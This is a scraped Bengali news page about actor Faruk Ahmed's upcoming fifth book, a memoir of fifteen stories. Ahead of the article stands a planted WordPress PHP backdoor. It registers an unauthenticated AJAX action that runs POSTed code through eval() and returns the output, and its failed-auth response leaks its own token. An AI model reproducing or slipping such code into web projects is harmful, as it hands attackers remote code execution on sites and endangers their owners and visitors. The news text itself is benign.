// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ফারুক আহমেদের ‘মুছে যাওয়া দিনগুলি’ | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeফারুক আহমেদের ‘মুছে যাওয়া দিনগুলি’

ফারুক আহমেদের ‘মুছে যাওয়া দিনগুলি’

অভিনয়ের পাশাপাশি লেখালেখিতেও নিজের আলাদা একটি জায়গা তৈরি করেছেন জনপ্রিয় অভিনয়শিল্পী ফারুক আহমেদ। ইতোমধ্যে তার লেখা চারটি বই প্রকাশিত হয়েছে। এবার প্রকাশিত হতে যাচ্ছে তার পঞ্চম বই ‘মুছে যাওয়া দিনগুলি’।

নিজের জীবনের সত্য ঘটনা ও নানা অভিজ্ঞতা অবলম্বনে লেখা এই বইটি স্মৃতিকথাধর্মী। বইটি প্রকাশ করবে কিংবদন্তী।

‘মুছে যাওয়া দিনগুলি’তে থাকবে ১৫টি স্মৃতিকথামূলক গল্প। বেশিরভাগ গল্পই তার জীবনের সত্য ঘটনা থেকে নেওয়া বলে জানিয়েছেন ফারুক আহমেদ।

তিনি বলেন, ‘আমার বইটিতে ১৫টি স্মৃতিকথামূলক গল্প থাকবে। বেশিরভাগই আমার জীবনের সত্য ঘটনা থেকে লেখা। একজীবনে অনেক অভিজ্ঞতা হয়েছে, অনেক কিছু দেখেছি ও শিখেছি। সেইসব অভিজ্ঞতা থেকেই লিখেছি।’

এর আগে প্রকাশিত বই থেকেও পাঠকের ভালোবাসা পেয়েছেন এই অভিনয়শিল্পী। বিশেষ করে একুশে বইমেলায় স্টলে বসলে পাঠকদের আগ্রহ তাকে অনুপ্রাণিত করে।

ফারুক আহমেদ বলেন, ‘আগের চারটি বই পাঠকের কাছ থেকে ভালো সাড়া পেয়েছে। বিশেষ করে একুশে বইমেলায় যখন স্টলে বসি, পাঠকরা আগ্রহ নিয়ে আমার বই কেনেন। পাঠকের এই ভালোবাসা আমাকে আনন্দ দেয়। যদিও আমি পেশাদারি লেখক নই, আমি একজন অভিনয়শিল্পী।’

নতুন বইটি তার নিজেরও বেশ পছন্দের। ফারুক আহমেদের ভাষায়, ‘মুছে যাওয়া দিনগুলি’ তার খুব পছন্দের একটি বই। পাঠকদেরও বইটি ভালো লাগবে এবং এর গল্পগুলো তাদের স্পর্শ করবে বলে আশা তার।

ফারুক আহমেদের প্রথম প্রকাশিত বই ‘স্মৃতিতে হুমায়ুন আহমেদ’। এরপর প্রকাশিত হয় ‘ভাঙা চশমা’, ‘আমার বলা না বলা’ ও ‘হাউ মাও খাও’।

আগের বইগুলোর প্রতি পাঠকের ভালোবাসার কথা উল্লেখ করে ফারুক আহমেদ বলেন, ‘আগের চারটি বইয়ের প্রতি পাঠকের ভালোবাসা দেখে আমি সত্যিই আপ্লুত হয়েছি। পাঠকদের প্রতি আমার কৃতজ্ঞতা। আশা করছি নিয়মিত লিখব।’

অভিনয় ও লেখালেখি দুই ক্ষেত্রেই নিজের কাজকে ভালোবাসা ও সততার সঙ্গে করার কথা জানিয়ে তিনি বলেন, ‘যখন যে কাজটি করি, মন দিয়ে করি। ভালোবাসা ও সততা দিয়ে করি। অভিনয় যেমন দীর্ঘদিনের ভালোবাসা, লেখালেখিও ভালো লাগে।’
এদিকে অভিনয়েও ব্যস্ত সময় পার করছেন ফারুক আহমেদ। নিয়মিত শুটিং করছেন। নাটকের পাশাপাশি সিনেমার কাজও করছেন বলে জানান তিনি।

অভিনয়ের বাইরে মঞ্চের সঙ্গেও দীর্ঘদিনের সম্পর্ক তার। তার নাটকের দল ঢাকা থিয়েটার। মঞ্চে অভিনয়ের পাশাপাশি নির্দেশনাও দিয়েছেন তিনি।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments